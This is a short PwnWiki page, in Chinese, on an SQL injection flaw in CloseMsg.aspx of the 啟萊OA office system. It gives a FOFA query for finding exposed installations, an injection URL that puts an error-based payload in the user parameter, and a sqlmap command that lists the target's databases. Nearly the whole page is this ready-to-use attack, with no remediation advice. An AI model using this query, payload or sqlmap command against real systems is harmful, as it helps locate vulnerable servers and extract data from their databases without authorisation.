啟萊OA CloseMsg.aspx SQL注入漏洞

From PwnWiki
Revision as of 09:26, 21 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="启莱OA" </pre> 存在SQL注入的文件為 CloseMsg.aspx: <pre> http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1 </pr...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

app="启莱OA"

存在SQL注入的文件為 CloseMsg.aspx:

http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1

SQLMAP

sqlmap -u "http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1" -p user --dbs